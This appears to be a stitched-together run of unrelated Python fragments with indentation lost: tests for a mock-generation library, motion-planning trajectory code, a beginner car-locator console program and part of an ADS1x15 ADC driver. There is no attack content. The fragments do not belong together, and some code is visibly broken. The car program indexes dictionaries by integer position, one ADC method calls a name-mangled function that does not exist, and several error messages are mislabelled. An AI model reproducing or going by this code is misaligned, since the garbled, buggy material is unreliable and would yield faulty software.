generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(generated)
# don't compare warning code since python version might be less than 3.8
assert expected_warnings[0:2] == generated_warnings[0:2]
if sys.version_info >= (3, 8):
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
exec(generated) # verify the validity of generated mocks code
first.using_not_implemented()
assert global_before == tests.sample.code.tested_module.global_counter
assert prop_before == tests.sample.code.tested_module.FirstClass.prop
exec("mock_not_implemented.assert_called_once()")
def test_generate_mocks_static_method_inner_calls(mocker):
global_before = tests.sample.code.tested_module.global_counter
prop_before = tests.sample.code.tested_module.FirstClass.prop
first = tests.sample.code.tested_module.FirstClass('20')
expected = """# mocked dependencies
mock_get_random_number = mocker.MagicMock(name='get_random_number')
mocker.patch('tests.sample.code.tested_module.get_random_number', new=mock_get_random_number)
mock_staticmethod = mocker.MagicMock(name='staticmethod')
mocker.patch('tests.sample.code.tested_module.staticmethod', new=mock_staticmethod)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_get_random_number, name='mock_get_random_number')
mock_autogen.generate_asserts(mock_staticmethod, name='mock_staticmethod')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated_mocks_function = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
first.increase_global_counter)
generated_mocks_function_from_class = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
tests.sample.code.tested_module.FirstClass.increase_global_counter)
assert generated_mocks_function == generated_mocks_function_from_class
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(
generated_mocks_function)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec(generated_mocks_function +
f"\nmock_get_random_number.return_value = {global_before}")
first.increase_global_counter()
assert global_before == tests.sample.code.tested_module.global_counter
assert prop_before == tests.sample.code.tested_module.FirstClass.prop
exec("mock_get_random_number.assert_called_once()")
def test_generate_mocks_class_method_inner_calls(mocker):
global_before = tests.sample.code.tested_module.global_counter
prop_before = tests.sample.code.tested_module.FirstClass.prop
first = tests.sample.code.tested_module.FirstClass('20')
expected = """# mocked dependencies
mock_get_random_number = mocker.MagicMock(name='get_random_number')
mocker.patch('tests.sample.code.tested_module.get_random_number', new=mock_get_random_number)
mock_increase_global_counter = mocker.MagicMock(name='increase_global_counter')
mocker.patch('tests.sample.code.tested_module.FirstClass.increase_global_counter', new=mock_increase_global_counter)
mock_classmethod = mocker.MagicMock(name='classmethod')
mocker.patch('tests.sample.code.tested_module.classmethod', new=mock_classmethod)
# calls to generate_asserts, put this after the 'act'
import mock_autogen
mock_autogen.generate_asserts(mock_get_random_number, name='mock_get_random_number')
mock_autogen.generate_asserts(mock_increase_global_counter, name='mock_increase_global_counter')
mock_autogen.generate_asserts(mock_classmethod, name='mock_classmethod')
"""
expected_warnings, expected_mocks, expected_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(expected)
generated_mocks_function = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
first.increase_class_counter)
generated_mocks_function_from_class = mock_autogen.generator.generate_mocks(
mock_autogen.generator.MockingFramework.PYTEST_MOCK,
tests.sample.code.tested_module.FirstClass.increase_class_counter)
assert generated_mocks_function == generated_mocks_function_from_class
generated_warnings, generated_mocks, generated_asserts = \
_extract_warnings_generated_mocks_and_generated_asserts(
generated_mocks_function)
assert expected_warnings == generated_warnings
assert expected_mocks == generated_mocks
assert expected_asserts == generated_asserts
# verify the validity of generated mocks code
exec(generated_mocks_function +
f"\nmock_get_random_number.return_value = {prop_before}")
first.increase_class_counter()
assert global_before == tests.sample.code.tested_module.global_counter
assert prop_before == tests.sample.code.tested_module.FirstClass.prop
exec("mock_get_random_number.assert_called_once()")
exec("mock_increase_global_counter.assert_called_once()")
def test_generate_asserts_are_in_same_folder_args(mock_everything_collection):
tests.sample.code.tested_module.are_in_same_folder('/some/path/file1.txt',
'/some/path/file2.txt')
mock_are_in_same_folder = mock_everything_collection.are_in_same_folder
generated = mock_autogen.generator.generate_asserts(
mock_are_in_same_folder)
assert 'assert 1 == mock_are_in_same_folder.call_count\n' \
"mock_are_in_same_folder.assert_called_once_with(" \
"'/some/path/file1.txt', '/some/path/file2.txt')\n" == generated
exec(generated) # verify the validity of assertions
def test_generate_asserts_rename_argument(mock_everything_collection):
tests.sample.code.tested_module.are_in_same_folder('/some/path/file1.txt',
'/some/path/file2.txt')
mock_are_in_same_folder = mock_everything_collection.are_in_same_folder
generated = mock_autogen.generator.generate_asserts(
mock_are_in_same_folder, name='my_mock')
assert 'assert 1 == my_mock.call_count\n' \
"my_mock.assert_called_once_with(" \
"'/some/path/file1.txt', '/some/path/file2.txt')\n" == generated
def test_generate_asserts_unable_to_find_argument(mock_everything_collection):
tests.sample.code.tested_module.are_in_same_folder('/some/path/file1.txt',
'/some/path/file2.txt')
generated = mock_autogen.generator.generate_asserts(
mock_everything_collection.are_in_same_folder)
assert 'assert 1 == arg.call_count\n' \
"arg.assert_called_once_with(" \
"'/some/path/file1.txt', '/some/path/file2.txt')\n" == generated
def test_generate_asserts_mocks_were_not_called(mock_everything_collection):
for mocked in mock_everything_collection:
generated = mock_autogen.generator.generate_asserts(mocked)
assert "mocked.assert_not_called()" == generated
exec(generated)
def test_generate_asserts_are_in_same_folder_kwargs(
mock_functions_only_collection):
tests.sample.code.tested_module.are_in_same_folder(
path1='/some/path/file1.txt', path2='/some/path/file2.txt')
mock_are_in_same_folder = mock_functions_only_collection.are_in_same_folder
generated = mock_autogen.generator.generate_asserts(
mock_are_in_same_folder)
assert "assert 1 == mock_are_in_same_folder.call_count\n" \
"mock_are_in_same_folder.assert_called_once_with(" \
"path1='/some/path/file1.txt', " \
"path2='/some/path/file2.txt')\n" == generated
exec(generated) # verify the validity of assertions
def test_generate_asserts_are_in_same_folder_mix_args_kwargs(
mock_everything_collection):
tests.sample.code.tested_module.are_in_same_folder(
'/some/path/file1.txt', path2='/some/path/file2.txt')
mock_are_in_same_folder = mock_everything_collection.are_in_same_folder
generated = mock_autogen.generator.generate_asserts(
mock_are_in_same_folder)
assert "assert 1 == mock_are_in_same_folder.call_count\n" \
"mock_are_in_same_folder.assert_called_once_with(" \
"'/some/path/file1.txt', " \
"path2='/some/path/file2.txt')\n" == generated
exec(generated) # verify the validity of assertions
def test_generate_asserts_rm_alias_builtin_only(mock_builtin_only_collection):
tests.sample.code.tested_module.rm_alias('/some/path/file1.txt')
mock_os_remove = mock_builtin_only_collection.os_remove
generated = mock_autogen.generator.generate_asserts(mock_os_remove)
assert "assert 1 == mock_os_remove.call_count\n" \
"mock_os_remove.assert_called_once_with('/some/path/file1.txt')\n" \
== generated
exec(generated) # verify the validity of assertions
def test_generate_asserts_append_to_cwd_builtin_only(
mock_modules_only_collection):
tests.sample.code.tested_module.append_to_cwd('/some/path/file1.txt')
mock_os = mock_modules_only_collection.os
generated = mock_autogen.generator.generate_asserts(mock_os)
assert re.match(
r"^mock_os.getcwd.assert_called_once_with\(\)\n"
r"mock_os.path.join.assert_called_once_with"
r"\(<MagicMock name='os.getcwd\(\)' id='\d+'>, "
r"'/some/path/file1.txt'\)\n$", generated)
# added ANY to match the mock parameter
from mock import ANY
mock_os.path.join.assert_called_once_with(ANY, '/some/path/file1.txt')
mock_os.getcwd.assert_called_once_with()
def test_generate_asserts_append_to_cwd_builtin_only_mocked_cwd(
mock_modules_only_collection):
mock_os = mock_modules_only_collection.os
# added this so the assert can be affective.
# this is an example of the code the user has to add on top of the utility
mock_os.getcwd.return_value = '/some/pwd'
tests.sample.code.tested_module.append_to_cwd('/some/path/file1.txt')
| |
(n_states)x1 ndarrays e.g. [[2.], [4.], [3.14]]
# n_states, n_controls: number of states and controls
# N: horizon
# T: time step
# lbg, lbx, ubg, ubx: lower and upper (l,u) state and input (x,g) bounds
# current_ref_traj, current_ref_inputs: reference trajectory and reference inputs as Nx(n_states) ndarrays# TODO: add shapes
# Outputs:
# x_casadi, u_casadi: trajectory states and inputs returned by Casadi
# if solution found:
# states: (N+1)x(n_states) ndarray e.g. [[1 2 0], [1.2 2.4 0], [2 3.5 0]]
# controls: (N)x(n_controls) ndarray e.g. [[0.5 0], [1 0.01], [1.2 -0.01]]
# else, [],[] returned
# """
#
# # Create an initial state trajectory that roughly accomplishes the desired state transfer (by interpolating)
# init_states_param = np.linspace(0, 1, N + 1)
# init_states = np.zeros([N + 1, n_states])
# dx = xT - x0
# for i in range(N + 1):
# init_states[i] = (x0 + init_states_param[i] * dx).flatten()
#
# # Create an initial input trajectory that roughly accomplishes the desired state transfer
# # (using interpolated states to compute rough estimate of controls)
# dist = la.norm(xT[0:2] - x0[0:2])
# ang_dist = xT[2][0] - x0[2][0]
# total_time = N * T
# const_vel = dist / total_time
# const_ang_vel = ang_dist / total_time
# init_inputs = np.array([const_vel, const_ang_vel] * N).reshape(-1, 2)
#
# ## set parameter
# constraint_states = []
# # constraint_states.append(x0.reshape(n_states))
#
#
# for ref_state in current_ref_traj:
# constraint_states.append(ref_state.reshape(n_states))
# constraint_states = np.array(constraint_states)
#
# init_inputs = []
# for ref_input in current_ref_inputs:
# init_inputs.append(ref_input.reshape(n_controls))
# init_inputs = np.array(init_inputs)
#
# solver.set_value(P, constraint_states)
# solver.set_value(STARTIDX, start_idx)
# solver.set_value(OBSPAD, obs_pad)
# solver.set_value(ENVPAD, env_pad)
# solver.set_initial(X, constraint_states)
# solver.set_initial(U, init_inputs)
# try:
# res = solver.solve()
# except:
# print('Steering NLP Failed')
# return [], []
#
# # Update the cost_total
# # cost_total = res.value(self.obj) # self.opti.debug.value(self.obj)
# # Obtain the optimal control input sequence
# u_casadi = res.value(U) # shape: (N, n_controls)
# # Get the predicted state trajectory for N time steps ahead
# x_casadi = res.value(X) # shape: # (N+1, n_states)
#
# print('delta', res.value(DELTA))
#
# return x_casadi, u_casadi
# def get_padded_edges():
# '''
# Finds the left, right, top, and bottom padded (by robot radius) edges for the obstacles and the environment
# Outputs:
# obs_edges = edges of obstacles in the form of a list where each element is a dictionary with "top","bottom", "right", and "left"
# env_edges = edges of environment in the form of a dictionary with "top","bottom", "right", and "left"
# obs_edges should be used as (x < "left") or (x > "right") or (y < "bottom") or (y > "top")
# env_edges should be used as (x > "left") and (x < "right") and (y > "bottom") and (y < "top")
# '''
# randArea1 = copy.copy(RANDAREA) # [xmin,xmax,ymin,ymax]
# obstacleList1 = copy.copy(OBSTACLELIST) # [ox,oy,wd,ht]
#
# # environment bounds
# xmin = randArea1[0]
# xmax = randArea1[1]
# ymin = randArea1[2]
# ymax = randArea1[3]
# # thickness of env edges (doesn't matter much, anything > 0 works)
# thickness = 0.1
# # original environment area - width and height
# width = xmax - xmin
# height = ymax - ymin
#
# env_edges = {"left": xmin+ROBRAD, "right": xmax-ROBRAD, "bottom": ymin+ROBRAD, "top": ymax-ROBRAD} # environment edges
# obs_edges = []
#
# # add enough padding for obstacles for robot radius
# for obs in obstacleList1:
# xmin = obs[0] - ROBRAD
# xmax = xmin + obs[2] + (2 * ROBRAD)
# ymin = obs[1] - ROBRAD
# ymax = ymin + obs[3] + (2 * ROBRAD)
# edges = {"left": xmin, "right": xmax, "bottom": ymin, "top": ymax}
# obs_edges.append(edges)
#
# return obs_edges, env_edges
# def find_dr_padding(alfa, N, obs_edges, horizon_covars):
# '''
# Finds DR padding value for each environment and obstacle edge
# '''
# xDir = np.array([1, 0, 0]) # x direction
# yDir = np.array([0, 1, 0]) # x direction
# num_obs = len(obs_edges)
#
# env_pad = np.zeros([N + 1, 4]) # for each time step, the four environment edges have their own dr padding (right, left, top, bottom)
# obs_pad = np.zeros([N + 1, 4 * num_obs]) # for each time step, each obstacle edge has its own dr padding (right, left, top, bottom)
#
# # find tightening value for all alfa values delta = sqrt((1-alfa)/alfa)
# alpha = np.array(alfa, float)
# delta = (1-alpha) / alpha
# delta = delta**(0.5)
#
# for n in range(1,N+1): # skip the first time step (no DR padding there - it is already realized)
# sigma = horizon_covars[n-1] # this step's covariance
#
# # environment dr padding
# rl_pad = delta[0] * math.sqrt(xDir.T @ sigma @ xDir) # padding along right/left direction
# tb_pad = delta[0] * math.sqrt(yDir.T @ sigma @ yDir) # padding along top/bottom direction
# env_pad[n, 0] = rl_pad # right
# env_pad[n, 1] = rl_pad # left
# env_pad[n, 2] = tb_pad # top
# env_pad[n, 3] = tb_pad # bottom
#
# # obstacle padding
# for ob in range(num_obs): # for every obstacle, do the above
# rl_pad = delta[ob+1] * math.sqrt(xDir.T @ sigma @ xDir) # padding along right/left direction
# tb_pad = delta[ob+1] * math.sqrt(yDir.T @ sigma @ yDir) # padding along top/bottom direction
# obs_pad[n, 4 * ob + 0] = rl_pad # right
# obs_pad[n, 4 * ob + 1] = rl_pad # left
# obs_pad[n, 4 * ob + 2] = tb_pad # top
# obs_pad[n, 4 * ob + 3] = tb_pad # bottom
#
# return env_pad, obs_pad
###############################################################################
###############################################################################
def load_pickle_file(filename):
'''
loads pickle file containing pathNodesList
'''
with open(filename, 'rb') as f:
pathNodesList = pickle.load(f)
return pathNodesList
def get_full_opt_traj_and_ctrls(pathNodesList):
'''
Extract the full state and control sequence from pathNodesList
'''
tree_node_inputs = [] # full optimal trajectory inputs
tree_node_states = [] # full optimal trajectory states
opt_traj_nodes = [] # only has the optimal trajectory using the sampled points
found_node_in_goal = False
if pathNodesList is not None:
print("Sampled paths exist")
least_cost_node = []
found_first_node = False
# find a node in the goal region
for node in pathNodesList:
x = node.means[-1, 0, :][0]
y = node.means[-1, 1, :][0]
xmin_goal = GOALAREA[0]
xmax_goal = GOALAREA[1]
ymin_goal = GOALAREA[2]
ymax_goal = GOALAREA[3]
if (x > xmin_goal) and (x < xmax_goal) and (y > ymin_goal) and (y < ymax_goal):
found_node_in_goal = True
if not found_first_node:
least_cost_node = node
found_first_node = True
elif node.cost < least_cost_node.cost:
least_cost_node = copy.copy(node)
goal_node = least_cost_node
# if a node in the goal region is not found, return
if not found_node_in_goal:
print("No node in goal region found")
return
else:
print('Found path with cost: ', goal_node.cost)
# if a node in the goal region is found, construct the optimal trajectory
traj = []
ctrl_inputs = []
num_traj_states = len(goal_node.means)
node_pt = [goal_node.means[-1, 0, :][0], goal_node.means[-1, 1, :][0], goal_node.means[-1, 2, :][0]]
for i in range(num_traj_states-1):
pt = [goal_node.means[i, 0, :][0], goal_node.means[i, 1, :][0], goal_node.means[i, 2, :][0]]
traj.append(pt)
ctrl = [goal_node.inputCommands[i, 0], goal_node.inputCommands[i, 1]]
ctrl_inputs.append(ctrl)
opt_traj_nodes = [node_pt] + opt_traj_nodes
tree_node_states = traj + tree_node_states #+ [node_pt]
tree_node_inputs = ctrl_inputs + tree_node_inputs
# find index of parent
idx_of_parent_node = goal_node.parent
while idx_of_parent_node != None: # if parent found
parent_node = pathNodesList[idx_of_parent_node] # get parent node
# add parent node info to data
traj = []
ctrl_inputs = []
node_pt = [parent_node.means[-1, 0, :][0], parent_node.means[-1, 1, :][0], parent_node.means[-1, 2, :][0]]
num_traj_states = len(parent_node.means)
for i in range(num_traj_states-2):
pt = [parent_node.means[i, 0, :][0], parent_node.means[i, 1, :][0], parent_node.means[i, 2, :][0]]
traj.append(pt)
ctrl = [parent_node.inputCommands[i, 0], parent_node.inputCommands[i, 1]]
ctrl_inputs.append(ctrl)
opt_traj_nodes = [node_pt] + opt_traj_nodes
tree_node_states = traj + tree_node_states
tree_node_inputs = ctrl_inputs + tree_node_inputs
# find index of parent
idx_of_parent_node = parent_node.parent
print('Number of steps: ', len(np.array(tree_node_states)))
return [np.array(opt_traj_nodes), np.array(tree_node_states), np.array(tree_node_inputs)]
def get_sampled_traj_and_ctrls(pathNodesList):
'''
Extract the nodes and control sequence at each node from pathNodesList
'''
start_state = []
control_inputs = []
state_trajectory = []
for k, node in enumerate(pathNodesList):
point = [node.means[-1, 0, :][0], node.means[-1, 1, :][0], node.means[-1, 2, :][0]]
ctrls = node.inputCommands
if k == 0:
start_state.append(point)
state_trajectory.append(point)
control_inputs.append(ctrls)
else:
state_trajectory.append(point)
control_inputs.append(ctrls)
tree_states, tree_ctrl = reshape_data(state_trajectory, control_inputs, 3) # 3 = num states
return [start_state, tree_states, tree_ctrl]
def reshape_data(state_trajectory, control_inputs, numstates):
'''
Reshapes the data of get_sampled_traj_and_ctrls
'''
traj = np.array(state_trajectory)
len_traj = len(state_trajectory)
traj = traj.reshape(len_traj, numstates)
ctrl = np.array(control_inputs)
return [traj, ctrl]
def plot_data(tree_states, sampled_opt_traj_nodes_, full_opt_traj_states, full_opt_traj_ctrls, new_filename, save_opt_path_plot):
'''
plots a figure (and saves it) with the extracted optimal trajectory and inputs along the heading direction
'''
# all sampled points
x_sampled = tree_states[:, 0]
y_sampled = tree_states[:, 1]
# select nodes for optimal trajectory | |
"""
Autonomous Car Locator
This is a program that helps autonomous cars to find out the location and direction
of other autonomous cars. It is all based on what is provided by the car and from what the car detects.
By <NAME>
"""
import random
def locator():
cars = [
{
"speed" : 50, #the speed of the current car
"compass" : "N", #the direction of the current car
"id" : 1423456, #the ID number of the car
"gps" : 36.00000 #the current GPS location of the current car
}
]
def info_input(): #this is to gather the speed and compass direction of your car and the other car
i = 0
while True:#len(cars) > i:
if i == 0:
print("YOUR CAR")
speed = speed_type()
cars[0][0] = speed
print("The current speed of your car is " + str(cars[0][0]) + "mph\n")
compass = compass_type()
cars[0][1] = compass
print("The current direction of your car is " + cars[0][1] + "\n")
else:
new_car = {
"speed" : 50, #the speed of the current car
"compass" : "N", #the direction of the current car
"id" : 1423456, #the ID number of the car
"gps" : 36.00000 #the current GPS location of the current car
}
print("Car " + str(i))
speed = speed_type()
new_car[0] = speed
print("The current speed of Car " + str(i) + " is " + str(new_car[0]) + "mph\n")
print("Both cars can only be traveling the same or opposite directions.")
print("Please only choose the same direction or the opposite on.")
compass = compass_type()
new_car[1] = compass
print("The current direction of Car " + str(i) + " is " + new_car[1] + "\n")
new_car[2] = random.randrange(1420,62416,2)
cars.append(new_car)
stop_count = input("If there are no more cars to add, type [E] for End or [C] for continue.\n")
stop_count = stop_count.upper()
if stop_count == "E" or stop_count == "END":
break
i += 1
print(len(cars))
def speed_type(): #if the input for the speed is not a number then it keeps asking for the speed
val_type = "str"
while val_type != "int":
speed = input("What is the speed of the car? ")
val_type = check_user_input(speed)
speed = int(speed)
return speed
def compass_type(): #if the input for the compass direction is not a number then it keeps asking
while True: #This loop through until an input is given that is one of the options
val_type = "int"
while val_type != "str":
compass = input("What is the direction that the car is traveling? [N], [S], [E}, [W] ")
val_type = check_user_input(compass)
compass = compass.upper()
if compass == "N" or compass == "S" or compass == "E" or compass == "W":
break #this verfies that the input is only as specifed, and then ends the loop, if not it continues
else:
continue
return compass
def check_user_input(input):
try:
# Convert it into integer
val = int(input)
val_type="int"
except ValueError:
try:
# Convert it into float
val = float(input)
val_type = "float"
except ValueError:
val_type = "str"
return val_type
info_input()
j = 1
while len(cars) > j:
print("The ID number of the car is " + str(cars[j][2]))
def speed_compare():
relative_speed = "faster" #the relative speed your car is going compared to other cars
if cars[0][0] > cars[j][0]:
print("Your car is going faster than Car " + str(j))
relative_speed = "faster"
elif cars[0][0] < cars[j][0]:
print("Your car is going slower than Car " + str(j))
relative_speed = "slower"
else:
print("Your car is going the same speed as Car " + str(j))
relative_speed = "same"
return relative_speed
def compass(): #used to compare the traveling direction of the two cars
if cars[0][1] == cars[j][1]:
print("You and Car " + str(j) + " are both going the same direction")
direction = "same"
elif cars[0][1] == "N" and cars[j][1] == "S":
print("You and Car " + str(j) + " are both going the opposite direction")
direction = "opposite"
elif cars[0][1] == "E" and cars[j][1] == "W":
print("You and Car " + str(j) + " are both going the opposite direction")
direction = "opposite"
elif cars[0][1] == "S" and cars[j][1] == "N":
print("You and Car " + str(j) + " are both going the opposite direction")
direction = "opposite"
elif cars[0][1] == "W" and cars[j][1] == "E":
print("You and Car " + str(j) + " are both going the opposite direction")
direction = "opposite"
return direction
def sensors(): #Which sensors are being triggered on your car, or where is the car is in relation to you
sensor = ["front", "right", "rear", "left"] #4 available sensors on the car, on all 4 sides
position = random.choice(sensor) #where is the other car located relative to yours
if position == "front":
print("The car is in front of your car")
elif position == "right":
print("The car is to the right of your car")
elif position == "left":
print("The car is to the left of your car")
else:
print("The car is behind your car")
return position
direction = compass()
relative_speed = speed_compare()
position = sensors()
def visual_before(): #displays what the current layout of the road is
print("\nCURRENT ROAD LAYOUT")
if direction == "same" and position == "front":
print("| | || | |")
print("| | || | " + str(j) + " |")
print("| | || Y | |")
print("| | || | |")
elif direction == "same" and position == "rear":
print("| | || | |")
print("| | || | Y |")
print("| | || " + str(j) + " | |")
print("| | || | |")
elif direction == "same" and position == "right":
print("| | || | |")
print("| | || | |")
print("| | || Y | " + str(j) + " |")
print("| | || | |")
elif direction == "same" and position == "left":
print("| | || | |")
print("| | || | |")
print("| | || " + str(j) + " | Y |")
print("| | || | |")
elif direction == "opposite":
print("| | || | |")
print("| | " + str(j) + " || | |")
print("| | || Y | |")
print("| | || | |")
def prediction(): #if the same conditions continue then this will be the predicted road layout
print("\nPREDICTED FUTURE LAYOUT")
if direction == "same" and (relative_speed == "same" or relative_speed == "slower") and position == "front":
print("The other car will remain in front of you.")
print("| | || | |")
print("| | || | " + str(j) + " |")
print("| | || Y | |")
print("| | || | |")
elif direction == "same" and (relative_speed == "same" or relative_speed == "faster") and position == "rear":
print("The other car will remain behind you.")
print("| | || | |")
print("| | || | Y |")
print("| | || " + str(j) + " | |")
print("| | || | |")
elif direction == "same" and relative_speed == "same" and position == "right":
print("The other car will remain to the right of you.")
print("| | || | |")
print("| | || | |")
print("| | || Y | " + str(j) + " |")
print("| | || | |")
elif direction == "same" and relative_speed == "same" and position == "left":
print("The other car will remain to the left of you.")
print("| | || | |")
print("| | || | |")
print("| | || " + str(j) + " | Y |")
print("| | || | |")
elif direction == "same" and relative_speed == "faster" and position == "front":
print("You will pass the other car and be in front of them.")
print("| | || | |")
print("| | || Y | |")
print("| | || | " + str(j) + " |")
print("| | || | |")
elif direction == "same" and relative_speed == "faster" and position == "left":
print("You will pass the other car and be in front of them.")
print("| | |
sps: delay >= 1/sps
# We add 0.1ms to be sure
delay = 1.0/sps+0.0001
time.sleep(delay)
# Read the conversion results
result = self.i2c.readList(self.__ADS1015_REG_POINTER_CONVERT, 2)
if (self.ic == self.__IC_ADS1015):
# Shift right 4 bits for the 12-bit ADS1015 and convert to mV
return ( ((result[0] << 8) | (result[1] & 0xFF)) >> 4 )*pga/2048.0
else:
# Return a mV value for the ADS1115
# (Take signed values into account as well)
val = (result[0] << 8) | (result[1])
if val > 0x7FFF:
return (val - 0xFFFF)*pga/32768.0
else:
return ( (result[0] << 8) | (result[1]) )*pga/32768.0
def readADCDifferential(self, chP=0, chN=1, pga=6144, sps=250):
"Gets a differential ADC reading from channels chP and chN in mV. \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
# Disable comparator, Non-latching, Alert/Rdy active low
# traditional comparator, single-shot mode
config = self.__ADS1015_REG_CONFIG_CQUE_NONE | \
self.__ADS1015_REG_CONFIG_CLAT_NONLAT | \
self.__ADS1015_REG_CONFIG_CPOL_ACTVLOW | \
self.__ADS1015_REG_CONFIG_CMODE_TRAD | \
self.__ADS1015_REG_CONFIG_MODE_SINGLE
# Set channels
if ( (chP == 0) & (chN == 1) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_0_1
elif ( (chP == 0) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_0_3
elif ( (chP == 2) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_2_3
elif ( (chP == 1) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_1_3
else:
if (self.debug):
print ("ADS1x15: Invalid channels specified: %d, %d" % (chP, chN))
return -1
# Set sample per seconds, defaults to 250sps
# If sps is in the dictionary (defined in init()) it returns the value of the constant
# othewise it returns the value for 250sps. This saves a lot of if/elif/else code!
if (self.ic == self.__IC_ADS1015):
config |= self.spsADS1015.setdefault(sps, self.__ADS1015_REG_CONFIG_DR_1600SPS)
else:
if ( (sps not in self.spsADS1115) & self.debug):
print ("ADS1x15: Invalid pga specified: %d, using 6144mV" % sps)
config |= self.spsADS1115.setdefault(sps, self.__ADS1115_REG_CONFIG_DR_250SPS)
# Set PGA/voltage range, defaults to +-6.144V
if ( (pga not in self.pgaADS1x15) & self.debug):
print ("ADS1x15: Invalid pga specified: %d, using 6144mV" % sps )
config |= self.pgaADS1x15.setdefault(pga, self.__ADS1015_REG_CONFIG_PGA_6_144V)
self.pga = pga
# Set 'start single-conversion' bit
config |= self.__ADS1015_REG_CONFIG_OS_SINGLE
# Write config register to the ADC
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
# Wait for the ADC conversion to complete
# The minimum delay depends on the sps: delay >= 1/sps
# We add 0.1ms to be sure
delay = 1.0/sps+0.0001
time.sleep(delay)
# Read the conversion results
result = self.i2c.readList(self.__ADS1015_REG_POINTER_CONVERT, 2)
if (self.ic == self.__IC_ADS1015):
# Shift right 4 bits for the 12-bit ADS1015 and convert to mV
return ( ((result[0] << 8) | (result[1] & 0xFF)) >> 4 )*pga/2048.0
else:
# Return a mV value for the ADS1115
# (Take signed values into account as well)
val = (result[0] << 8) | (result[1])
if val > 0x7FFF:
return (val - 0xFFFF)*pga/32768.0
else:
return ( (result[0] << 8) | (result[1]) )*pga/32768.0
def readADCDifferential01(self, pga=6144, sps=250):
"Gets a differential ADC reading from channels 0 and 1 in mV\
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
return self.readADCDifferential(0, 1, pga, sps)
def readADCDifferential03(self, pga=6144, sps=250):
"Gets a differential ADC reading from channels 0 and 3 in mV \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
return self.readADCDifferential(0, 3, pga, sps)
def readADCDifferential13(self, pga=6144, sps=250):
"Gets a differential ADC reading from channels 1 and 3 in mV \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
return self.__readADCDifferential(1, 3, pga, sps)
def readADCDifferential23(self, pga=6144, sps=250):
"Gets a differential ADC reading from channels 2 and 3 in mV \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
return self.readADCDifferential(2, 3, pga, sps)
def startContinuousConversion(self, channel=0, pga=6144, sps=250):
"Starts the continuous conversion mode and returns the first ADC reading \
in mV from the specified channel. \
The sps controls the sample rate. \
The pga must be given in mV, see datasheet page 13 for the supported values. \
Use getLastConversionResults() to read the next values and \
stopContinuousConversion() to stop converting."
# Default to channel 0 with invalid channel, or return -1?
if (channel > 3):
if (self.debug):
print ("ADS1x15: Invalid channel specified: %d" % channel)
return -1
# Disable comparator, Non-latching, Alert/Rdy active low
# traditional comparator, continuous mode
# The last flag is the only change we need, page 11 datasheet
config = self.__ADS1015_REG_CONFIG_CQUE_NONE | \
self.__ADS1015_REG_CONFIG_CLAT_NONLAT | \
self.__ADS1015_REG_CONFIG_CPOL_ACTVLOW | \
self.__ADS1015_REG_CONFIG_CMODE_TRAD | \
self.__ADS1015_REG_CONFIG_MODE_CONTIN
# Set sample per seconds, defaults to 250sps
# If sps is in the dictionary (defined in init()) it returns the value of the constant
# othewise it returns the value for 250sps. This saves a lot of if/elif/else code!
if (self.ic == self.__IC_ADS1015):
config |= self.spsADS1015.setdefault(sps, self.__ADS1015_REG_CONFIG_DR_1600SPS)
else:
if ( (sps not in self.spsADS1115) & self.debug):
print ("ADS1x15: Invalid pga specified: %d, using 6144mV" % sps )
config |= self.spsADS1115.setdefault(sps, self.__ADS1115_REG_CONFIG_DR_250SPS)
# Set PGA/voltage range, defaults to +-6.144V
if ( (pga not in self.pgaADS1x15) & self.debug):
print ("ADS1x15: Invalid pga specified: %d, using 6144mV" % sps )
config |= self.pgaADS1x15.setdefault(pga, self.__ADS1015_REG_CONFIG_PGA_6_144V)
self.pga = pga
# Set the channel to be converted
if channel == 3:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_3
elif channel == 2:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_2
elif channel == 1:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_1
else:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_0
# Set 'start single-conversion' bit to begin conversions
# No need to change this for continuous mode!
config |= self.__ADS1015_REG_CONFIG_OS_SINGLE
# Write config register to the ADC
# Once we write the ADC will convert continously
# we can read the next values using getLastConversionResult
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
# Wait for the ADC conversion to complete
# The minimum delay depends on the sps: delay >= 1/sps
# We add 0.5ms to be sure
delay = 1.0/sps+0.0005
time.sleep(delay)
# Read the conversion results
